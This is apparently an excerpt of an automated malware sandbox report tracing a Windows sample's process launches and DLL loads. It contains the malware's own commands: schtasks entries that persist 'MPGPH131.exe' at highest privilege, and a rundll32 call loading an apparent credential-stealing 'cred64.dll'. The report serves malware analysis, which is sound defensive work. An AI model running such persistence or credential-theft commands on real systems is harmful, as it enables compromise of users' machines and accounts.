Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3632 --field-trial-handle=1920,i,17797173087143306694,7612419587186816950,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3872 --field-trial-handle=1920,i,17797173087143306694,7612419587186816950,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
Source: C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 --field-trial-handle=1636,i,5624198576768077496,445941079671464976,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Windows\System32\netsh.exe
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1984,i,457568203381776828,11237095852378400144,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process created: C:\Users\user\AppData\Local\Temp\1000187001\build12.exe "C:\Users\user\AppData\Local\Temp\1000187001\build12.exe"
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll, Main
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process created: C:\Users\user\AppData\Local\Temp\1000188001\build12.exe
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe
Source: C:\Windows\System32\rundll32.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: ifmon.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: mprapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: rasmontr.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: mfc42u.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: authfwcfg.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: fwpolicyiomgr.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: firewallapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: fwbase.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcmonitor.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: dot3cfg.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: dot3api.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: onex.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: eappcfg.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: eappprxy.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: fwcfg.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: hnetmon.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: netshell.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: netsetupapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: netiohlp.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: nettrace.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: nshhttp.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: httpapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: nshipsec.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: activeds.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: polstore.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: winipsec.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: adsldpc.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: adsldpc.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: nshwfp.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: p2pnetsh.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: p2p.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: rpcnsh.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wcnnetsh.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wlanapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: whhelper.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wlancfg.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wshelper.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wevtapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wwancfg.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wwapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wcmapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: rmclient.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: mobilenetworking.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: peerdistsh.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: ktmw32.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: mprmsg.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\netsh.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kdscli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: mstask.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: dui70.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: duser.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: chartv.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: atlthunk.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000055001\831840b410.exe Section loaded: pcacli.dll
